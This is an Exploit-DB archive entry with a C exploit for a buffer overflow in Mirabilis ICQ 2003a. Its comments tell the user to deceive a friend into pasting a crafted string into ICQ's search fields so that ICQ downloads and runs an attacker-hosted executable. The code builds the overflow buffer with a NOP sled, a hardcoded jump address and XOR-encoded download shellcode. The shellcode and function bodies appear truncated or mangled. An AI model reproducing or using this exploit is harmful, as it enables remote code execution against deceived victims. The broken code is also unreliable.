Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit

ID EDB-ID:1277
Type exploitdb
Reporter ATmaCA
Modified 2005-10-29T00:00:00


Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit. Remote exploit for windows platform

* Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan and delicon

* Usage:
* Execute exploit, it will create "bof.txt" in current directory.
* Open ICQ <= 2003a and click "Add" button
* "Add / Invite Users to Your Contact List" dialog will be opened
* Copy the content of "bof.txt" to "First name" and "Last name" fields.
* Press "find" button
* Now, icq will download and run your server which you specified in WebUrl field.
* This exploit requires social engineering skills to use it. For example you should
* tell your friend that you've found a easter-egg and if he wants to see it he has to
* type your vuln. string to first and last name fields in icq then press find button etc...

* Affected versions:
* Mirabilis ICQ Pro 2003a and prior versions.
* Tested with :
* ICQ 2003a Build #3800 on Win XP Pro Sp2
* ICQ 2002a Build #3728 on Win XP Pro Sp2

#include <stdio.h>
#include <string.h>
#include <windows.h>

char *Sifrele(char *pszName1)
       char *pszName = pszName1;
       int Xor = 0x1d;
       int Size = strlen(pszName);
       for(int i=0;i<Size;i++)
               pszName[i] = pszName[i]^Xor;
       return pszName;

void main(int argc, char *argv[])
       if (argc < 2)
               printf("\n\n\tMirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit\n");
               printf("\tBug discovered & exploit coded by ATmaCA\n");
               printf("\tWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com\n");
               printf("\tE-Mail: atmaca@icqmail.com\n");
               printf("\tCredit to Kozan and delicon\n\n");

               printf(" icq_bof <WebUrl>\n");
               printf(" Example:icq_bof http://www.atmacasoft.com/small.exe\n");


       /* Generic win32 http download shellcode
       xored with 0x1d by delikon (http://delikon.de/) */
       char shellcode[] = "\xEB"

       FILE *file;

       char buf[485];
       char *web;
       short int weblength;
       char *pointer = NULL;
       char *newshellcode;

       web = argv[1];
       weblength = (short int)0xff22;
       pointer = strstr(shellcode,"\x22\xff");
       weblength -= strlen(web)+1;
       newshellcode = (char*)malloc(sizeof(shellcode)+strlen(web)+1);

       if( (file = fopen("bof.txt", "w+")) == NULL )

       memset(buf, 0x90, 480);

       //ret - icqate32.dll ( jmp esp addr - [Universal]
       *(DWORD *) &buf[34]  = 0x12025c5c;
       *(DWORD *) &buf[480]  = 0x00000000;

       fprintf(file, "%s", buf);

       printf("\r\nbof.txt has been generated!\r\n");


// milw0rm.com [2005-10-29]